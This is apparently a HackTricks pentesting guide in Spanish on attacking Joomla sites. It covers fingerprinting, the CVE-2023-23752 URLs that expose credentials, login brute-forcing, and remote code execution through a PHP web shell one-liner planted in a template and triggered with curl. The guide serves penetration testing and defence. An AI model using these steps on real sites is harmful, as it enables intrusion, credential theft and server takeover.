Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Profundiza tu experiencia en Mobile Security con 8kSec Academy. Domina la seguridad de iOS y Android a través de nuestros cursos autoguiados y obtén una certificación:
Joomla recopila algunas estadísticas de uso anónimas, como la descomposición de las versiones de Joomla, PHP y bases de datos, así como los sistemas operativos de servidor en uso en las instalaciones de Joomla. Estos datos se pueden consultar a través de su API pública.
Verifica el meta
robots.txt
README.txt
En /administrator/manifests/files/joomla.xml puedes ver la versión.
En /language/en-GB/en-GB.xml puedes obtener la versión de Joomla.
En plugins/system/cache/cache.xml puedes ver una versión aproximada.
En 80,443 - La metodología de pentesting web es una sección sobre escáneres de CMS que pueden escanear Joomla.
Las versiones desde 4.0.0 hasta 4.2.7 son vulnerables a la divulgación de información no autenticada (CVE-2023-23752) que volcará credenciales y otra información.
Usuarios: http://<host>/api/v1/users?public=true
Archivo de Configuración: http://<host>/api/index.php/v1/config/application?public=true
Módulo MSF: scanner/http/joomla_api_improper_access_checks
o script ruby: 51334
Puedes usar este script para intentar realizar un ataque de fuerza bruta en el inicio de sesión.
Si lograste obtener credenciales de administrador, puedes RCE dentro de él agregando un fragmento de código PHP para obtener RCE. Podemos hacer esto personalizando una plantilla.
Haz clic en Templates
en la parte inferior izquierda bajo Configuration
para abrir el menú de plantillas.
Haz clic en un nombre de plantilla. Elijamos protostar
bajo el encabezado de columna Template
. Esto nos llevará a la página Templates: Customise
.
Finalmente, puedes hacer clic en una página para abrir el código fuente. Elijamos la página error.php
. Agregaremos un PHP one-liner para obtener ejecución de código de la siguiente manera:
system($_GET['cmd']);
Guardar y cerrar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Script de explotación de Joomla que eleva XSS a RCE u Otras Vulnerabilidades Críticas. Para más información, consulta esta publicación. Proporciona soporte para las versiones de Joomla 5.X.X, 4.X.X y 3.X.X, y permite:
Escalación de privilegios: Crea un usuario en Joomla.
(RCE) Edición de plantillas integradas: Edita plantillas integradas en Joomla.
(Personalizado) Explotaciones personalizadas: Explotaciones personalizadas para complementos de Joomla de terceros.
Profundiza tu experiencia en Seguridad Móvil con 8kSec Academy. Domina la seguridad de iOS y Android a través de nuestros cursos autoguiados y obtén certificación:
Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)